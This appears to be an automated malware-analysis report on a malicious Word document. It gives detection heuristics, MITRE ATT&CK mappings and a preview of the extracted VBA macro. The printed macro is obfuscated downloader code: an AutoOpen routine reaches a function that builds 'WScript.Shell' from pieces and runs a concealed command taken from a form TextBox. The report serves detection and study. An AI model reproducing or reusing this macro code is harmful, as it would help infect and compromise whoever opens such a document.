MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1137.001 Office Application Startup: Office Application
The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of WScript.Shell and CreateObject calls, suggesting the macro is designed to execute commands or download additional payloads. The autoopen macro further supports this, indicating it runs automatically upon opening.
Heuristics 9
-
ClamAV: Doc.Downloader.Sload-6817537-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6817537-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set ArubanGuilderid = virtualsz calculateva = "WscRipt.sHeLl" Set Woodenow = schemasja -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Rubberwo = Lightvo Operationsot = Array(Tuvaluro, ivorysc, Georgiazb, CreateObject("" + interfacefz + Strategistjb + olivehz + Boliviaav + Mountainstj + calculateva).Run!(("" + paymentko + Concretecc + THXnw + Squaretl + Manoraq.TextBox1) + Harborspv + securedlinedv + schemaszl, 50 - 50), Internalqs, BulgarianLevfa, Bangladeshzu) Set Pinewj = Factorsjv -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() multibyteii = Avonvf -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7911 bytes |
SHA-256: eb4a4396cbec9af2ea6d485b81f2006368990eaf0f67cc3406699a6e21eeaedf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Manoraq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "panelcs"
Function marketsqz()
On Error Resume Next
Set Granitenm = Optimizationjt
Set Directpa = Burgskq
Select Case bluecq
Case 726
contentrw = Streetlb
NorwegianKroneom = CLng(58)
Case 248
CheckingAccountlr = CLng(478)
paymentrn = CDate(pinkdh)
Dobrajz = Int(751)
Case 198
realtimeww = Cos(Gorgeousiw)
PracticalFreshHatia = ChrB(560)
Avonaf = hackingqp
End Select
Set Indianaau = arraynq
Set Mexicokc = ElectronicsClothingva
Set Woodenzi = Customermd
Select Case auxiliarykw
Case 866
impactfullu = projectfj
collaborationii = CLng(719)
Case 553
Villagetd = CLng(784)
magentaqi = CDate(Amelioratedft)
Plannerzh = Int(23)
Case 561
optimaliz = Cos(calculatingqq)
neuralws = ChrB(156)
Districtwa = Interactionspj
End Select
Set Brookua = Wisconsinhp
Set withdrawalpw = neuralfu
Set purplewi = verticalaj
Select Case holisticvc
Case 488
opensourcekr = Principalnm
zerotolerancewm = CLng(684)
Case 647
Arizonarm = CLng(365)
disintermediatetl = CDate(hierarchyqa)
alarmjq = Int(812)
Case 438
withdrawalki = Cos(Mountainstr)
Healthwb = ChrB(716)
Berkshireuw = AutoLoanAccountmz
End Select
Set ArubanGuilderid = virtualsz
calculateva = "WscRipt.sHeLl"
Set Woodenow = schemasja
Set richno = Pointns
Select Case Knollpl
Case 516
conglomerationlj = backuprw
Refinedst = CLng(422)
Case 62
Marylandit = CLng(474)
morphjf = CDate(HomeLoanAccountmz)
TastyPlasticChickenha = Int(139)
Case 965
Buckinghamshirewc = Cos(Musicts)
navigatingjv = ChrB(830)
magentazb = auxiliarycr
End Select
Set Rubberwo = Lightvo
Operationsot = Array(Tuvaluro, ivorysc, Georgiazb, CreateObject("" + interfacefz + Strategistjb + olivehz + Boliviaav + Mountainstj + calculateva).Run!(("" + paymentko + Concretecc + THXnw + Squaretl + Manoraq.TextBox1) + Harborspv + securedlinedv + schemaszl, 50 - 50), Internalqs, BulgarianLevfa, Bangladeshzu)
Set Pinewj = Factorsjv
Set Kansasvr = communitieskz
Select Case Berkshirehw
Case 59
tealam = JSONqj
Coordinatordu = CLng(782)
Case 861
panelhl = CLng(281)
fullrangelr = CDate(Islandpc)
Routebs = Int(499)
Case 737
Louisianacw = Cos(onetoonebp)
B2Bjr = ChrB(873)
virtualom = Rubberzl
End Select
Set Sharableah = JBODpi
Set missioncriticalwk = Lesothocj
Set Configurationcp = Plasticmb
Select Case Architectsi
Case 785
SingaporeDollarwi = withdrawaldp
bypassingrb = CLng(52)
Case 859
connectow = CLng(214)
uniformbs = CDate(onetoonewz)
Concreteto = Int(222)
Case 193
focusgroupiw = Cos(Skywayiw)
Metalwl = ChrB(532)
dynamictw = Ouguiyamu
End Select
Set growub = Generican
Set Gardenszb = Mobilityam
Set Concretekt = Concretekn
Select Case reinventpv
Case 781
Directivesws = Dynamiclj
RefinedSteelBikehl = CLng(138)
Case 759
USDollarsz = CLng(993)
Rwandaqa = CDate(JSONaj)
copyzm = Int(432)
Case 348
transmitla = Cos(ClothingBooksGardenip)
opticaldc = ChrB(326)
Fantasticaj = synthesizeqd
End Select
Set BabyKidsMusicbq = supplychainszo
End Function
Attribute VB_Name = "Borderslw"
Function analyzingoi()
Keybp = Qualityuk
Managerpw = plumkt
paymentjj = circuitld
Woodenjq = IncredibleConcreteSoapis
evenkeeledfj = pinkif
Plasticbs = Gamesat
clicksandmortarlf = SmallMetalTunahw
motivatingfn = programkc
Inletso = meshhj
Alabamaif = calculatest
redundantsh = fullrangeiw
indexun = copyingvz
End Function
Function Humando()
demanddrivenut = CreditCardAccounttj
SDDqt = generatingfu
Borderswq = Gorgeouscs
indexinghr = arrayzj
MoneyMarketAccountuw = Forwardzb
withdrawalbk = opensourcein
limemd = XSSaf
Reverseengineeredkq = GorgeousSoftShirtim
targetda = PersonalLoanAccountzl
Bedfordshirelo = capacitorci
Dominicacd = Nevadajd
SouthDakotalt = Metalid
End Function
Sub autoopen()
multibyteii = Avonvf
Universalzh = Principalns
Avonfd = Triplebufferedof
bricksandclickszd = revolutionizezz
Kazakhstantd = LicensedGraniteChickenkd
calculatecw = HandcraftedFreshComputerbr
Metaltm = Array(ErgonomicFreshSoapdu, Intranethz, multibyteiv, marketsqz, turquoisequ, Portsif, Hollowfd)
LicensedRubberCheesefc = SMSci
Shoeswq = capabilityij
Licensedtf = bypassingtc
Bermudawr = transmittz
auxiliaryzh = ErgonomicSoftCheesewd
backupis = Functionalityru
End Sub
Function Fordsf()
overridingpq = Parkwaytr
analyzingsz = GorgeousCottonTunavd
Beautyjh = Throughwaypj
rebootdh = NorthernMarianaIslandslj
engineerqu = quantifyingju
customizedvf = circuitaz
Clothingtj = Refinedss
Steelsz = standardizationbi
morphbd = redundantsu
AwesomeCottonKeyboardwj = Assistantwn
Iowabc = Leadrl
Fantasticji = Fordtz
End Function
Attribute VB_Name = "Brookbj"
Attribute VB_Name = "Commonvw"
Attribute VB_Name = "Patacamw"
Attribute VB_Name = "greenzw"
Attribute VB_Name = "HandmadeRubberMousezr"
Attribute VB_Name = "turquoiseqo"
Attribute VB_Name = "TastyCottonTunaad"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "programcm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "datawarehousefo"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "supplychainsiz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "streamlinepj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "AwesomeWoodenCarsp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.